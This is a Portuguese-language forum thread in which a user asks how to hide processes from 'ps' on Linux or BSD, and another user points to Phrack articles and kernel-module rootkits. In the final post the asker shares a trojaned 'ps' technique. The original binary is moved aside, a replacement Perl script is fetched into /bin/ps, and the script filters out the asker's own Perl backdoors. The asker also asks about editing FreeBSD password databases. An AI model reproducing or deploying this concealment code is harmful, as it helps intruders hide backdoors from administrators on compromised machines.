#  > Geral >  > Segurança >  >  Esconder processo ps aux

## andersoneduardo

Galera Under-linux!
alguem sabe como esconder o processo do ps , mudar o nome algo assim!
tem um programa nao lembro nome q faz isso mais estou querendo fazer com as ferramentas do proprio sistema!vi uns artigos mais nao funfou!rs
seja BSD ou Linux!

falow

----------


## PEdroArthurJEdi

sabe programar amigo?
Na revista phrack tem um artugo sobre como esconder processos... procure lá!

----------


## andersoneduardo

opa.!
eles falam se nao me engano de alterar o codigo fonte do ps para nao mostrar certo processos e tambem algo com LKM!nao mexo com C!rsrs

isso ainda to estudando!

aproveitando!
tem como editar o arquivo spwd.db e pwd.db é la q fica os verdadeiros arquivo de senha do FreeBSD né?
tbm to a estudando isso!rsrs

falow!

Obrigadao ae cara!

----------


## PEdroArthurJEdi

Alterar os fontes do ps não um método muito legal...
Eu uso essa técnica para esconder processo em uma honeypot...
O sujeito pode testar o md5 sum do binário e ver que é uma farça...
Os LKM são o método mais "hard core" porém você só precisará codificar o mecanismo de camuflagem uma vez...

Não entendo de BSD's

----------


## andersoneduardo

> Alterar os fontes do ps não um método muito legal...
> Eu uso essa técnica para esconder processo em uma honeypot...
> O sujeito pode testar o md5 sum do binário e ver que é uma farça...
> Os LKM são o método mais "hard core" porém você só precisará codificar o mecanismo de camuflagem uma vez...
> 
> Não entendo de BSD's


Opa cara!

to criando um script em perl ta funcionando!
rsrs
falow

abrçs!

----------


## PEdroArthurJEdi

posta ai pra gente

----------


## andersoneduardo

> posta ai pra gente


Copiamos o ps original para ps.old!

hacr#mv /bin/ps /bin/ps.old

Baixando e copiando o Fake PS!

hacr#fetch Your Page.com
hacr#mv ps.pl /bin/ps
hacr#chmod +x /bin/ps

Obs:Você tem que alterar o script de acordo com sua Backdoor!

No meu caso minhas backdoors são feitas em Perl ae o processo fica com o nome de (perl5.8.8).

Segue o codigo:

#!/usr/bin/perl
#Credits by [email protected]
use warnings;
use strict;

my $string = $ARGV[0];
if($string){
my @net = qx/ps.old $string/;
my @hide = grep(!/(perl5.8.8)/, @net);
my @dd = grep(!/ps.old/, @hide);
print @dd;
}
else
{
my @nett = qx/ps.old/;
my @hidee = grep(!/(perl5.8.8)/, @nett);
my @d = grep(!/ps.old/, @hidee);
print @d;
}

no meu blog tbm tem do netstat e to criando do socket!

----------

